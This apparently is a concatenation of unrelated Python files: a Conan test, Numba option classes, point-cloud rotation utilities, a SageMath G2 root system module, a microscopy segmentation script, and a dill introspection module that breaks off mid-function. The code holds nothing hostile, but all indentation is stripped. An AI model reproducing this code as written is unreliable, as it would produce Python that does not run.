class CMakeConfigsTest(unittest.TestCase):
def test_test_package_configs(self):
client = TestClient()
name = "Hello0"
files = multi_config_files(name, test=True)
client.save(files, clean_first=True)
client.run("create . user/testing")
self.assertIn("Hello Release Hello0", client.out)
self.assertIn("Hello Debug Hello0", client.out)
def test_cmake_multi(self):
client = TestClient()
deps = None
for name in ["Hello0", "Hello1", "Hello2"]:
files = multi_config_files(name, test=False, deps=deps)
client.save(files, clean_first=True)
deps = [name]
if name != "Hello2":
client.run("export . lasote/stable")
client.run('install . --build missing')
client.run("build .")
cmd = os.sep.join([".", "bin", "say_hello"])
client.run_command(cmd)
self.assertIn("Hello Release Hello2 Hello Release Hello1 Hello Release Hello0",
" ".join(str(client.out).splitlines()))
client.run_command(cmd + "_d")
self.assertIn("Hello Debug Hello2 Hello Debug Hello1 Hello Debug Hello0",
" ".join(str(client.out).splitlines()))
|
py | 1a3058fb23ba11df9eb6228e028a03afc4ae99c2 | """
Defines CPU Options for use in the CPU target
"""
class FastMathOptions(object):
"""
Options for controlling fast math optimization.
"""
def __init__(self, value):
# https://releases.llvm.org/7.0.0/docs/LangRef.html#fast-math-flags
valid_flags = {
'fast',
'nnan', 'ninf', 'nsz', 'arcp',
'contract', 'afn', 'reassoc',
}
if isinstance(value, FastMathOptions):
self.flags = value.flags.copy()
elif value is True:
self.flags = {'fast'}
elif value is False:
self.flags = set()
elif isinstance(value, set):
invalid = value - valid_flags
if invalid:
raise ValueError("Unrecognized fastmath flags: %s" % invalid)
self.flags = value
elif isinstance(value, dict):
invalid = set(value.keys()) - valid_flags
if invalid:
raise ValueError("Unrecognized fastmath flags: %s" % invalid)
self.flags = {v for v, enable in value.items() if enable}
else:
msg = "Expected fastmath option(s) to be either a bool, dict or set"
raise ValueError(msg)
def __bool__(self):
return bool(self.flags)
__nonzero__ = __bool__
def __repr__(self):
return f"FastMathOptions({self.flags})"
class ParallelOptions(object):
"""
Options for controlling auto parallelization.
"""
def __init__(self, value):
if isinstance(value, bool):
self.enabled = value
self.comprehension = value
self.reduction = value
self.inplace_binop = value
self.setitem = value
self.numpy = value
self.stencil = value
self.fusion = value
self.prange = value
elif isinstance(value, dict):
self.enabled = True
self.comprehension = value.pop('comprehension', True)
self.reduction = value.pop('reduction', True)
self.inplace_binop = value.pop('inplace_binop', True)
self.setitem = value.pop('setitem', True)
self.numpy = value.pop('numpy', True)
self.stencil = value.pop('stencil', True)
self.fusion = value.pop('fusion', True)
self.prange = value.pop('prange', True)
if value:
msg = "Unrecognized parallel options: %s" % value.keys()
raise NameError(msg)
elif isinstance(value, ParallelOptions):
self.enabled = value.enabled
self.comprehension = value.comprehension
self.reduction = value.reduction
self.inplace_binop = value.inplace_binop
self.setitem = value.setitem
self.numpy = value.numpy
self.stencil = value.stencil
self.fusion = value.fusion
self.prange = value.prange
else:
msg = "Expect parallel option to be either a bool or a dict"
raise ValueError(msg)
class InlineOptions(object):
"""
Options for controlling inlining
"""
def __init__(self, value):
ok = False
if isinstance(value, str):
if value in ('always', 'never'):
ok = True
else:
ok = hasattr(value, '__call__')
if ok:
self._inline = value
else:
msg = ("kwarg 'inline' must be one of the strings 'always' or "
"'never', or it can be a callable that returns True/False. "
"Found value %s" % value)
raise ValueError(msg)
@property
def is_never_inline(self):
"""
True if never inline
"""
return self._inline == 'never'
@property
def is_always_inline(self):
"""
True if always inline
"""
return self._inline == 'always'
@property
def has_cost_model(self):
"""
True if a cost model is provided
"""
return not (self.is_always_inline or self.is_never_inline)
@property
def value(self):
"""
The raw value
"""
return self._inline
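# ---------------------------------------------------------------------------
# Hypothetical usage sketch (not part of the original module), showing the
# accepted forms for the option objects defined above:
#
#     FastMathOptions(True).flags                 # {'fast'}
#     FastMathOptions({'nnan', 'ninf'}).flags     # {'nnan', 'ninf'}
#     ParallelOptions({'prange': False}).prange   # False; other sub-options default to True
#     InlineOptions('always').is_always_inline    # True
# ---------------------------------------------------------------------------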
|
py | 1a305a69c89f7036862c6e0ab50cc0e0a291f95e | import math
import numpy as np
import torch
from scipy.spatial import cKDTree
def setup_seed(seed):
torch.backends.cudnn.deterministic = True
torch.manual_seed(seed)
torch.cuda.manual_seed_all(seed)
np.random.seed(seed)
def square_dists(points1, points2):
'''
Calculate square dists between two group points
:param points1: shape=(B, N, C)
:param points2: shape=(B, M, C)
:return:
'''
B, N, C = points1.shape
_, M, _ = points2.shape
dists = torch.sum(torch.pow(points1, 2), dim=-1).view(B, N, 1) + \
torch.sum(torch.pow(points2, 2), dim=-1).view(B, 1, M)
dists -= 2 * torch.matmul(points1, points2.permute(0, 2, 1))
#dists = torch.where(dists < 0, torch.ones_like(dists) * 1e-7, dists) # Very Important for dist = 0.
return dists.float()
def random_select_points(pc, m):
if m < 0:
idx = np.arange(pc.shape[0])
np.random.shuffle(idx)
return pc[idx, :]
n = pc.shape[0]
replace = False if n >= m else True
idx = np.random.choice(n, size=(m, ), replace=replace)
return pc[idx, :]
def generate_rotation_x_matrix(theta):
mat = np.eye(3, dtype=np.float32)
mat[1, 1] = math.cos(theta)
mat[1, 2] = -math.sin(theta)
mat[2, 1] = math.sin(theta)
mat[2, 2] = math.cos(theta)
return mat
def generate_rotation_y_matrix(theta):
mat = np.eye(3, dtype=np.float32)
mat[0, 0] = math.cos(theta)
mat[0, 2] = math.sin(theta)
mat[2, 0] = -math.sin(theta)
mat[2, 2] = math.cos(theta)
return mat
def generate_rotation_z_matrix(theta):
mat = np.eye(3, dtype=np.float32)
mat[0, 0] = math.cos(theta)
mat[0, 1] = -math.sin(theta)
mat[1, 0] = math.sin(theta)
mat[1, 1] = math.cos(theta)
return mat
def generate_random_rotation_matrix(angle1=-45, angle2=45):
thetax = np.random.uniform() * np.pi * angle2 / 180.0
thetay = np.random.uniform() * np.pi * angle2 / 180.0
thetaz = np.random.uniform() * np.pi * angle2 / 180.0
matx = generate_rotation_x_matrix(thetax)
maty = generate_rotation_y_matrix(thetay)
matz = generate_rotation_z_matrix(thetaz)
return np.dot(matx, np.dot(maty, matz))
def generate_random_tranlation_vector(range1=-0.5, range2=0.5):
tranlation_vector = np.random.uniform(range1, range2, size=(3, )).astype(np.float32)
return tranlation_vector
def transform(pc, R, t=None):
pc = np.dot(pc, R.T)
if t is not None:
pc = pc + t
return pc
def batch_transform(batch_pc, batch_R, batch_t=None):
'''
:param batch_pc: shape=(B, N, 3)
:param batch_R: shape=(B, 3, 3)
:param batch_t: shape=(B, 3)
:return: shape(B, N, 3)
'''
transformed_pc = torch.matmul(batch_pc, batch_R.permute(0, 2, 1).contiguous())
if batch_t is not None:
transformed_pc = transformed_pc + torch.unsqueeze(batch_t, 1)
return transformed_pc
# The transformation between unit quaternion and rotation matrix is referenced to
# https://zhuanlan.zhihu.com/p/45404840
def quat2mat(quat):
w, x, y, z = quat
R = np.zeros((3, 3), dtype=np.float32)
R[0][0] = 1 - 2*y*y - 2*z*z
R[0][1] = 2*x*y - 2*z*w
R[0][2] = 2*x*z + 2*y*w
R[1][0] = 2*x*y + 2*z*w
R[1][1] = 1 - 2*x*x - 2*z*z
R[1][2] = 2*y*z - 2*x*w
R[2][0] = 2*x*z - 2*y*w
R[2][1] = 2*y*z + 2*x*w
R[2][2] = 1 - 2*x*x - 2*y*y
return R
def batch_quat2mat(batch_quat):
'''
:param batch_quat: shape=(B, 4)
:return:
'''
w, x, y, z = batch_quat[:, 0], batch_quat[:, 1], batch_quat[:, 2], \
batch_quat[:, 3]
device = batch_quat.device
B = batch_quat.size()[0]
R = torch.zeros(dtype=torch.float, size=(B, 3, 3)).to(device)
R[:, 0, 0] = 1 - 2 * y * y - 2 * z * z
R[:, 0, 1] = 2 * x * y - 2 * z * w
R[:, 0, 2] = 2 * x * z + 2 * y * w
R[:, 1, 0] = 2 * x * y + 2 * z * w
R[:, 1, 1] = 1 - 2 * x * x - 2 * z * z
R[:, 1, 2] = 2 * y * z - 2 * x * w
R[:, 2, 0] = 2 * x * z - 2 * y * w
R[:, 2, 1] = 2 * y * z + 2 * x * w
R[:, 2, 2] = 1 - 2 * x * x - 2 * y * y
return R
def mat2quat(mat):
w = math.sqrt(mat[0, 0] + mat[1, 1] + mat[2, 2] + 1 + 1e-8) / 2
x = (mat[2, 1] - mat[1, 2]) / (4 * w + 1e-8)
y = (mat[0, 2] - mat[2, 0]) / (4 * w + 1e-8)
z = (mat[1, 0] - mat[0, 1]) / (4 * w + 1e-8)
return w, x, y, z
def jitter_point_cloud(pc, sigma=0.01, clip=0.05):
N, C = pc.shape
assert(clip > 0)
#jittered_data = np.clip(sigma * np.random.randn(N, C), -1*clip, clip).astype(np.float32)
jittered_data = np.clip(
np.random.normal(0.0, scale=sigma, size=(N, 3)),
-1 * clip, clip).astype(np.float32)
jittered_data += pc
return jittered_data
def shift_point_cloud(pc, shift_range=0.1):
N, C = pc.shape
shifts = np.random.uniform(-shift_range, shift_range, (1, C)).astype(np.float32)
pc += shifts
return pc
def random_scale_point_cloud(pc, scale_low=0.8, scale_high=1.25):
scale = np.random.uniform(scale_low, scale_high, 1)
pc *= scale
return pc
def inv_R_t(R, t):
inv_R = R.permute(0, 2, 1).contiguous()
inv_t = - inv_R @ t[..., None]
return inv_R, torch.squeeze(inv_t, -1)
def uniform_2_sphere(num: int = None):
"""Uniform sampling on a 2-sphere
Source: https://gist.github.com/andrewbolster/10274979
Args:
num: Number of vectors to sample (or None if single)
Returns:
Random Vector (np.ndarray) of size (num, 3) with norm 1.
If num is None returned value will have size (3,)
"""
if num is not None:
phi = np.random.uniform(0.0, 2 * np.pi, num)
cos_theta = np.random.uniform(-1.0, 1.0, num)
else:
phi = np.random.uniform(0.0, 2 * np.pi)
cos_theta = np.random.uniform(-1.0, 1.0)
theta = np.arccos(cos_theta)
x = np.sin(theta) * np.cos(phi)
y = np.sin(theta) * np.sin(phi)
z = np.cos(theta)
return np.stack((x, y, z), axis=-1)
def random_crop(pc, p_keep):
rand_xyz = uniform_2_sphere()
centroid = np.mean(pc[:, :3], axis=0)
pc_centered = pc[:, :3] - centroid
dist_from_plane = np.dot(pc_centered, rand_xyz)
mask = dist_from_plane > np.percentile(dist_from_plane, (1.0 - p_keep) * 100)
return pc[mask, :]
def shuffle_pc(pc):
return np.random.permutation(pc)
def flip_pc(pc, r=0.5):
if np.random.random() > r:
pc[:, 1] = -1 * pc[:, 1]
return pc
def angle(v1: torch.Tensor, v2: torch.Tensor):
"""Compute angle between 2 vectors
For robustness, we use the same formulation as in PPFNet, i.e.
angle(v1, v2) = atan2(cross(v1, v2), dot(v1, v2)).
This handles the case where one of the vectors is 0.0, since torch.atan2(0.0, 0.0)=0.0
Args:
v1: (B, *, 3)
v2: (B, *, 3)
Returns:
"""
cross_prod = torch.stack([v1[..., 1] * v2[..., 2] - v1[..., 2] * v2[..., 1],
v1[..., 2] * v2[..., 0] - v1[..., 0] * v2[..., 2],
v1[..., 0] * v2[..., 1] - v1[..., 1] * v2[..., 0]], dim=-1)
cross_prod_norm = torch.norm(cross_prod, dim=-1)
dot_prod = torch.sum(v1 * v2, dim=-1)
return torch.atan2(cross_prod_norm, dot_prod)
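# ---------------------------------------------------------------------------
# Hypothetical usage sketch (not part of the original module). It assumes `pc`
# is an (N, 3) numpy array of points.
#
#     R = generate_random_rotation_matrix()      # 3x3 rotation matrix
#     t = generate_random_tranlation_vector()    # length-3 translation
#     pc_t = transform(pc, R, t)                 # rotate then translate
#     w, x, y, z = mat2quat(R)
#     R_back = quat2mat((w, x, y, z))            # approximately equal to R
# ---------------------------------------------------------------------------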
|
py | 1a305d3908c23751a396191f4d9795628afa0074 | """
Root system data for type G
"""
#*****************************************************************************
# Copyright (C) 2008-2009 Daniel Bump
# Copyright (C) 2008-2009 Justin Walker
# Copyright (C) 2008-2013 Nicolas M. Thiery <nthiery at users.sf.net>
#
# Distributed under the terms of the GNU General Public License (GPL)
# http://www.gnu.org/licenses/
#*****************************************************************************
from __future__ import print_function
from __future__ import absolute_import
from . import ambient_space
from sage.sets.family import Family
from sage.combinat.root_system.root_lattice_realizations import RootLatticeRealizations
class AmbientSpace(ambient_space.AmbientSpace):
"""
EXAMPLES::
sage: e = RootSystem(['G',2]).ambient_space(); e
Ambient space of the Root system of type ['G', 2]
One can not construct the ambient lattice because the simple
coroots have rational coefficients::
sage: e.simple_coroots()
Finite family {1: (0, 1, -1), 2: (1/3, -2/3, 1/3)}
sage: e.smallest_base_ring()
Rational Field
By default, this ambient space uses the barycentric projection for plotting::
sage: L = RootSystem(["G",2]).ambient_space()
sage: e = L.basis()
sage: L._plot_projection(e[0])
(1/2, 989/1142)
sage: L._plot_projection(e[1])
(-1, 0)
sage: L._plot_projection(e[2])
(1/2, -989/1142)
sage: L = RootSystem(["A",3]).ambient_space()
sage: l = L.an_element(); l
(2, 2, 3, 0)
sage: L._plot_projection(l)
(0, -1121/1189, 7/3)
.. SEEALSO::
- :meth:`sage.combinat.root_system.root_lattice_realizations.RootLatticeRealizations.ParentMethods._plot_projection`
TESTS::
sage: TestSuite(e).run()
sage: [WeylDim(['G',2],[a,b]) for a,b in [[0,0], [1,0], [0,1], [1,1]]] # indirect doctest
[1, 7, 14, 64]
"""
def dimension(self):
"""
EXAMPLES::
sage: e = RootSystem(['G',2]).ambient_space()
sage: e.dimension()
3
"""
return 3
def simple_root(self, i):
"""
EXAMPLES::
sage: CartanType(['G',2]).root_system().ambient_space().simple_roots()
Finite family {1: (0, 1, -1), 2: (1, -2, 1)}
"""
return self.monomial(1)-self.monomial(2) if i == 1 else self.monomial(0)-2*self.monomial(1)+self.monomial(2)
def positive_roots(self):
"""
EXAMPLES::
sage: CartanType(['G',2]).root_system().ambient_space().positive_roots()
[(0, 1, -1), (1, -2, 1), (1, -1, 0), (1, 0, -1), (1, 1, -2), (2, -1, -1)]
"""
return [ self(v) for v in
[[0,1,-1],[1,-2,1],[1,-1,0],[1,0,-1],[1,1,-2],[2,-1,-1]]]
def negative_roots(self):
"""
EXAMPLES::
sage: CartanType(['G',2]).root_system().ambient_space().negative_roots()
[(0, -1, 1), (-1, 2, -1), (-1, 1, 0), (-1, 0, 1), (-1, -1, 2), (-2, 1, 1)]
"""
return [ self(v) for v in
[[0,-1,1],[-1,2,-1],[-1,1,0],[-1,0,1],[-1,-1,2],[-2,1,1]]]
def fundamental_weights(self):
"""
EXAMPLES::
sage: CartanType(['G',2]).root_system().ambient_space().fundamental_weights()
Finite family {1: (1, 0, -1), 2: (2, -1, -1)}
"""
return Family({ 1: self([1,0,-1]),
2: self([2,-1,-1])})
_plot_projection = RootLatticeRealizations.ParentMethods.__dict__['_plot_projection_barycentric']
from .cartan_type import CartanType_standard_finite, CartanType_simple, CartanType_crystallographic
class CartanType(CartanType_standard_finite, CartanType_simple, CartanType_crystallographic):
def __init__(self):
"""
EXAMPLES::
sage: ct = CartanType(['G',2])
sage: ct
['G', 2]
sage: ct._repr_(compact = True)
'G2'
sage: ct.is_irreducible()
True
sage: ct.is_finite()
True
sage: ct.is_crystallographic()
True
sage: ct.is_simply_laced()
False
sage: ct.dual()
['G', 2] relabelled by {1: 2, 2: 1}
sage: ct.affine()
['G', 2, 1]
TESTS::
sage: TestSuite(ct).run()
"""
CartanType_standard_finite.__init__(self, "G", 2)
def _latex_(self):
r"""
Return a latex representation of ``self``.
EXAMPLES::
sage: latex(CartanType(['G',2]))
G_2
sage: latex(CartanType(['G',2]).dual())
G_2 \text{ relabelled by } \left\{1 : 2, 2 : 1\right\}
"""
return "G_2"
AmbientSpace = AmbientSpace
def coxeter_number(self):
"""
Return the Coxeter number associated with ``self``.
EXAMPLES::
sage: CartanType(['G',2]).coxeter_number()
6
"""
return 6
def dual_coxeter_number(self):
"""
Return the dual Coxeter number associated with ``self``.
EXAMPLES::
sage: CartanType(['G',2]).dual_coxeter_number()
4
"""
return 4
def dynkin_diagram(self):
"""
Returns a Dynkin diagram for type G.
EXAMPLES::
sage: g = CartanType(['G',2]).dynkin_diagram()
sage: g
3
O=<=O
1 2
G2
sage: sorted(g.edges())
[(1, 2, 1), (2, 1, 3)]
"""
from .dynkin_diagram import DynkinDiagram_class
g = DynkinDiagram_class(self)
g.add_edge(1,2)
g.set_edge_label(2,1,3)
return g
def _latex_dynkin_diagram(self, label=lambda i: i, node=None, node_dist=2, dual=False):
r"""
Return a latex representation of the Dynkin diagram.
EXAMPLES::
sage: print(CartanType(['G',2])._latex_dynkin_diagram())
\draw (0,0) -- (2 cm,0);
\draw (0, 0.15 cm) -- +(2 cm,0);
\draw (0, -0.15 cm) -- +(2 cm,0);
\draw[shift={(0.8, 0)}, rotate=180] (135 : 0.45cm) -- (0,0) -- (-135 : 0.45cm);
\draw[fill=white] (0 cm, 0 cm) circle (.25cm) node[below=4pt]{$1$};
\draw[fill=white] (2 cm, 0 cm) circle (.25cm) node[below=4pt]{$2$};
<BLANKLINE>
"""
if node is None:
node = self._latex_draw_node
ret = "\\draw (0,0) -- (%s cm,0);\n"%node_dist
ret += "\\draw (0, 0.15 cm) -- +(%s cm,0);\n"%node_dist
ret += "\\draw (0, -0.15 cm) -- +(%s cm,0);\n"%node_dist
if dual:
ret += self._latex_draw_arrow_tip(0.5*node_dist+0.2, 0, 0)
else:
ret += self._latex_draw_arrow_tip(0.5*node_dist-0.2, 0, 180)
ret += node(0, 0, label(1))
ret += node(node_dist, 0, label(2))
return ret
def ascii_art(self, label=lambda i: i, node=None):
"""
Return an ascii art representation of the Dynkin diagram.
EXAMPLES::
sage: print(CartanType(['G',2]).ascii_art(label=lambda x: x+2))
3
O=<=O
3 4
"""
if node is None:
node = self._ascii_art_node
ret = " 3\n{}=<={}\n".format(node(label(1)), node(label(2)))
return ret + "{!s:4}{!s:4}".format(label(1), label(2))
def dual(self):
r"""
Return the dual Cartan type.
This uses that `G_2` is self-dual up to relabelling.
EXAMPLES::
sage: G2 = CartanType(['G',2])
sage: G2.dual()
['G', 2] relabelled by {1: 2, 2: 1}
sage: G2.dynkin_diagram()
3
O=<=O
1 2
G2
sage: G2.dual().dynkin_diagram()
3
O=<=O
2 1
G2 relabelled by {1: 2, 2: 1}
"""
return self.relabel({1:2, 2:1})
def _default_folded_cartan_type(self):
"""
Return the default folded Cartan type.
EXAMPLES::
sage: CartanType(['G', 2])._default_folded_cartan_type()
['G', 2] as a folding of ['D', 4]
"""
from sage.combinat.root_system.type_folded import CartanTypeFolded
return CartanTypeFolded(self, ['D', 4], [[1, 3, 4], [2]])
# For unpickling backward compatibility (Sage <= 4.1)
from sage.structure.sage_object import register_unpickle_override
register_unpickle_override('sage.combinat.root_system.type_G', 'ambient_space', AmbientSpace)
|
py | 1a305d494478a6d7d10a37d8e5ef279e975879cb | import os
import glob
# Our numerical workhorses
import numpy as np
import pandas as pd
import scipy.special
# Import the project utils
import sys
sys.path.insert(0, '../')
import image_analysis_utils as im_utils
# Useful plotting libraries
import matplotlib.pyplot as plt
import matplotlib.cm as cm
import matplotlib as mpl
import seaborn as sns
# Image analysis libraries
import skimage.io
import skimage.filters
import skimage.segmentation
import scipy.ndimage
# Set plotting style
im_utils.set_plotting_style()
#==============================================================================
# METADATA
#==============================================================================
DATE = 20161118
USERNAME = 'mrazomej'
OPERATOR = 'O2'
BINDING_ENERGY = -13.9
REPRESSORS = (0, 0, 130)
IPDIST = 0.160 # in units of µm per pixel
STRAINS = ['auto', 'delta', 'RBS1027']
IPTG_RANGE = (0, 0.1, 5, 10, 25, 50, 75, 100, 250, 500, 1000, 5000)
#==============================================================================
# Define the data directory.
data_dir = '../../../data/microscopy/' + str(DATE) + '/'
# Glob the profile and noise images.
yfp_glob = glob.glob(data_dir + '*yfp_profile*/*.tif')
rfp_glob = glob.glob(data_dir + '*mCherry_profile*/*.tif')
noise_glob = glob.glob(data_dir + '*noise*/*.tif')
# Load the images as collections
yfp_profile = skimage.io.ImageCollection(yfp_glob)
rfp_profile = skimage.io.ImageCollection(rfp_glob)
noise_profile = skimage.io.ImageCollection(noise_glob)
# Need to split the noise profile image into the two channels
noise_rfp = [noise_profile[i][0] for i, _ in enumerate(noise_profile)]
noise_yfp = [noise_profile[i][1] for i, _ in enumerate(noise_profile)]
# Generate averages and plot them.
rfp_avg = im_utils.average_stack(rfp_profile)
yfp_avg = im_utils.average_stack(yfp_profile)
rfp_noise = im_utils.average_stack(noise_rfp)
yfp_noise = im_utils.average_stack(noise_yfp)
with sns.axes_style('white'):
fig, ax = plt.subplots(2, 2, figsize=(6,6))
ax = ax.ravel()
ax[0].imshow(yfp_avg, cmap=plt.cm.viridis)
ax[0].set_title('yfp profile')
ax[1].imshow(rfp_avg, cmap=plt.cm.plasma)
ax[1].set_title('rfp profile')
ax[2].imshow(yfp_noise, cmap=plt.cm.Greens_r)
ax[2].set_title('yfp noise')
ax[3].imshow(rfp_noise, cmap=plt.cm.Reds_r)
ax[3].set_title('rfp noise')
plt.tight_layout()
plt.savefig('./outdir/background_correction.png')
#==============================================================================
# Iterate through each strain and concentration to make the dataframes.
dfs = []
# Select random IPTG and random strain to print the example segmentation
ex_iptg = np.random.choice(IPTG_RANGE)
ex_strain = STRAINS[-1]
for i, st in enumerate(STRAINS):
print(st)
for j, iptg in enumerate(IPTG_RANGE):
# Load the images
        if (iptg == 0) and (st != STRAINS[-1]):
images = glob.glob(data_dir + '*' + st + '_*/*.tif')
else:
images = glob.glob(data_dir + '*' + st + '*_' + str(iptg) +
'uMIPTG*/*.ome.tif')
        if len(images) != 0:
ims = skimage.io.ImageCollection(images)
# Select random image to print example segmentation
ex_no = np.random.choice(np.arange(0, len(images) - 1))
for z, x in enumerate(ims):
_, m, y = im_utils.ome_split(x)
y_flat = im_utils.generate_flatfield(y, yfp_noise, yfp_avg)
# Segment the mCherry channel.
m_seg = im_utils.log_segmentation(m, label=True)
# Print example segmentation for the random image
if (st==ex_strain) & (iptg == ex_iptg) & (z == ex_no):
merge = im_utils.example_segmentation(m_seg, _, 10/IPDIST)
skimage.io.imsave('./outdir/example_segmentation.png', merge)
# Extract the measurements.
im_df = im_utils.props_to_df(m_seg, physical_distance=IPDIST,
intensity_image=y_flat)
# Add strain and IPTG concentration information.
im_df.insert(0, 'IPTG_uM', iptg)
im_df.insert(0, 'repressors', REPRESSORS[i])
im_df.insert(0, 'rbs', st)
im_df.insert(0, 'binding_energy', BINDING_ENERGY)
im_df.insert(0, 'operator', OPERATOR)
im_df.insert(0, 'username', USERNAME)
im_df.insert(0, 'date', DATE)
# Append the dataframe to the global list.
dfs.append(im_df)
# Concatenate the dataframe
df_im = pd.concat(dfs, axis=0)
df_im.to_csv('./outdir/' + str(DATE) + '_' + OPERATOR + '_' +\
STRAINS[-1] + '_raw_segmentation.csv', index=False)
|
py | 1a305d589fd99a0bec3c4029563e5f8162b0535a | #!/usr/bin/env python
#
# Author: Mike McKerns (mmckerns @caltech and @uqfoundation)
# Copyright (c) 2008-2016 California Institute of Technology.
# Copyright (c) 2016-2019 The Uncertainty Quantification Foundation.
# License: 3-clause BSD. The full license text is available at:
# - https://github.com/uqfoundation/dill/blob/master/LICENSE
"""
Methods for detecting objects leading to pickling failures.
"""
import dis
from inspect import ismethod, isfunction, istraceback, isframe, iscode
from .pointers import parent, reference, at, parents, children
from ._dill import _trace as trace
from ._dill import PY3
__all__ = ['baditems','badobjects','badtypes','code','errors','freevars',
'getmodule','globalvars','nestedcode','nestedglobals','outermost',
'referredglobals','referrednested','trace','varnames']
def getmodule(object, _filename=None, force=False):
"""get the module of the object"""
from inspect import getmodule as getmod
module = getmod(object, _filename)
if module or not force: return module
if PY3: builtins = 'builtins'
else: builtins = '__builtin__'
builtins = __import__(builtins)
from .source import getname
name = getname(object, force=True)
return builtins if name in vars(builtins).keys() else None
def outermost(func): # is analogous to getsource(func,enclosing=True)
"""get outermost enclosing object (i.e. the outer function in a closure)
NOTE: this is the object-equivalent of getsource(func, enclosing=True)
"""
if PY3:
if ismethod(func):
_globals = func.__func__.__globals__ or {}
elif isfunction(func):
_globals = func.__globals__ or {}
else:
return #XXX: or raise? no matches
_globals = _globals.items()
else:
if ismethod(func):
_globals = func.im_func.func_globals or {}
elif isfunction(func):
_globals = func.func_globals or {}
else:
return #XXX: or raise? no matches
_globals = _globals.iteritems()
# get the enclosing source
from .source import getsourcelines
try: lines,lnum = getsourcelines(func, enclosing=True)
except: #TypeError, IOError
lines,lnum = [],None
code = ''.join(lines)
# get all possible names,objects that are named in the enclosing source
_locals = ((name,obj) for (name,obj) in _globals if name in code)
# now only save the objects that generate the enclosing block
for name,obj in _locals: #XXX: don't really need 'name'
try:
if getsourcelines(obj) == (lines,lnum): return obj
except: #TypeError, IOError
pass
return #XXX: or raise? no matches
def nestedcode(func, recurse=True): #XXX: or return dict of {co_name: co} ?
"""get the code objects for any nested functions (e.g. in a closure)"""
func = code(func)
if not iscode(func): return [] #XXX: or raise? no matches
nested = set()
for co in func.co_consts:
if co is None: continue
co = code(co)
if co:
nested.add(co)
if recurse: nested |= set(nestedcode(co, recurse=True))
return list(nested)
def code(func):
'''get the code object for the given function or method
NOTE: use dill.source.getsource(CODEOBJ) to get the source code
'''
if PY3:
im_func = '__func__'
func_code = '__code__'
else:
im_func = 'im_func'
func_code = 'func_code'
if ismethod(func): func = getattr(func, im_func)
if isfunction(func): func = getattr(func, func_code)
if istraceback(func): func = func.tb_frame
if isframe(func): func = func.f_code
if iscode(func): return func
return
#XXX: ugly: parse dis.dis for name after "<code object" in line and in globals?
def referrednested(func, recurse=True): #XXX: return dict of {__name__: obj} ?
"""get functions defined inside of func (e.g. inner functions in a closure)
NOTE: results may differ if the function has been executed or not.
If len(nestedcode(func)) > len(referrednested(func)), try calling func().
If possible, python builds code objects, but delays building functions
until func() is called.
"""
if PY3:
att1 = '__code__'
att0 = '__func__'
else:
att1 = 'func_code' # functions
att0 = 'im_func' # methods
import gc
funcs = set()
# get the code objects, and try to track down by referrence
for co in nestedcode(func, recurse):
# look for function objects that refer to the code object
for obj in gc.get_referrers(co):
# get methods
_ = getattr(obj, att0, None) # ismethod
if getattr(_, att1, None) is co: funcs.add(obj)
# get functions
elif getattr(obj, att1, None) is co: funcs.add(obj)
# get frame objects
elif getattr(obj, 'f_code', None) is co: funcs.add(obj)
# get code objects
elif hasattr(obj, 'co_code') and obj is co: funcs.add(obj)
# frameobjs => func.func_code.co_varnames not in func.func_code.co_cellvars
# funcobjs => func.func_code.co_cellvars not in func.func_code.co_varnames
# frameobjs are not found, however funcobjs are...
# (see: test_mixins.quad ... and test_mixins.wtf)
# after execution, code objects get compiled, and then may be found by gc
return list(funcs)
def freevars(func):
"""get objects defined in enclosing code that are referred to by func
returns a dict of {name:object}"""
if PY3:
im_func = '__func__'
func_code = '__code__'
func_closure = '__closure__'
else:
im_func = 'im_func'
func_code = 'func_code'
func_closure = 'func_closure'
if ismethod(func): func = getattr(func, im_func)
if isfunction(func):
closures = getattr(func, func_closure) or ()
func = getattr(func, func_code).co_freevars # get freevars
else:
return {}
return dict((name,c.cell_contents) for (name,c) in zip(func,closures))
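# A minimal comment-only sketch of freevars (not part of the original module;
# make_adder is an invented example):
#
#     def make_adder(n):
#         offset = n
#         def add(x):
#             return x + offset
#         return add
#
#     freevars(make_adder(3))   # -> {'offset': 3}
#
# i.e. the names the inner function closes over, mapped to their cell contents.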
# thanks to Davies Liu for recursion of globals
def nestedglobals(func, recurse=True):
"""get the names of any globals found within func"""
func = code(func)
if func is None: return list()
from .temp import capture
names = set()
with capture('stdout') as out:
dis.dis(func) #XXX: dis.dis(None) disassembles last traceback
for line in out.getvalue().splitlines():
if '_GLOBAL' in line:
name = line.split('(')[-1].split(')')[0]
names.add(name)
for co in getattr(func, 'co_consts', tuple()):
if co and recurse and iscode(co):
names.update(nestedglobals(co, recurse=True))
return list(names)
def referredglobals(func, recurse=True, builtin=False):
"""get the names of objects in the global scope referred to by func"""
return globalvars(func, recurse, builtin).keys()
def globalvars(func, recurse=True, builtin=False):
"""get objects defined in global scope that are referred to by func
return a dict of {name:object}"""
if PY3:
im_func = '__func__'
func_code = '__code__'
func_globals = '__globals__'
func_closure = '__closure__'
else:
im_func = 'im_func'
func_code = 'func_code'
func_globals = 'func_globals'
func_closure = 'func_closure'
if ismethod(func): func = getattr(func, im_func)
if isfunction(func):
globs = vars(getmodule(sum)).copy() if builtin else {}
# get references from within closure
orig_func, func = func, set()
for obj in getattr(orig_func, func_closure) or {}:
_vars = globalvars(obj.cell_contents, recurse, builtin) or {}
func.update(_vars) #XXX: (above) be wary of infinte recursion?
globs.update(_vars)
# get globals
globs.update(getattr(orig_func, func_globals) or {})
# get names of references
if not recurse:
func.update(getattr(orig_func, func_code).co_names)
else:
func.update(nestedglobals(getattr(orig_func, func_code)))
# find globals for all entries of func
for key in func.copy(): #XXX: unnecessary...?
nested_func = globs.get(key)
if nested_func is orig_func:
#func.remove(key) if key in func else None
continue #XXX: globalvars(func, False)?
func.update(globalvars(nested_func, True, builtin))
elif iscode(func):
globs = vars(getmodule(sum)).copy() if builtin else {}
#globs.update(globals())
if not recurse:
func = func.co_names # get names
else:
orig_func = func.co_name # to stop infinite recursion
func = set(nestedglobals(func))
# find globals for all entries of func
for key in func.copy(): #XXX: unnecessary...?
if key is orig_func:
#func.remove(key) if key in func else None
continue #XXX: globalvars(func, False)?
nested_func = globs.get(key)
func.update(globalvars(nested_func, True, builtin))
else:
return {}
#NOTE: if name not in func_globals, then we skip it...
return dict((name,globs[name]) for name in func if name in globs)
def varnames(func):
"""get names of variables defined by func
returns a tuple (local vars, local vars referrenced by nested functions)"""
func = code(func)
if not iscode(func):
return () #XXX: better ((),())? or None?
return func.co_varnames, func.co_cellvars
def baditems(obj, exact=False, safe=False): #XXX: obj=globals() ?
"""get items in object that fail to pickle"""
if not hasattr(obj,'__iter__'): # is not iterable
